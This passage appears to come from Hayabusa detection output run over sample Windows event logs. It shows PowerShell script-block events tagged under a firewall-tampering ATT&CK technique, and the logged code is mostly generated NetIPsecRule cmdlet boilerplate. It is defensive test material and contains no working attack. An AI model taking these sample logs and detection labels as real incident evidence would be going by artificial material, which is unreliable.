[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { 
$__cmdletization_objectModelWrapper.EndProcessing()",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; 
IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; 
ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing()",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"} } catch { throw } } # 
.EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecRule' -Alias '*' function Show-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])][OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement')] param( [Parameter(ParameterSetName='EnumerateFull1')] [string] ${PolicyStore}, [Parameter(ParameterSetName='EnumerateFull1')] [string] ${GPOSession}, [Parameter(ParameterSetName='EnumerateFull1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='EnumerateFull1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='EnumerateFull1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { 
[object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Dependents'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameter.ParameterTypeName = 'Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement' 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('EnumerateFull', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Show-NetIPsecRule' -Alias '*' function Find-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Find2')] [string] ${LocalAddress}, [Parameter(ParameterSetName='Find2', Mandatory=$true)] [string] ${RemoteAddress}, [Parameter(ParameterSetName='Find2')] [string] ${Protocol}, [Parameter(ParameterSetName='Find2')] [uint16] ${LocalPort}, [Parameter(ParameterSetName='Find2')] [uint16] ${RemotePort}, [Parameter(ParameterSetName='Find2')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Find2')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Find2')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 
([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 
'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name 
= 'RemotePort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Binding",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"} } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecRule' -Alias '*' function Show-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])][OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement')] param( [Parameter(ParameterSetName='EnumerateFull1')] [string] ${PolicyStore}, [Parameter(ParameterSetName='EnumerateFull1')] [string] ${GPOSession}, [Parameter(ParameterSetName='EnumerateFull1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='EnumerateFull1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='EnumerateFull1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } 
catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Dependents'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameter.ParameterTypeName = 'Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement' $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('EnumerateFull', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() 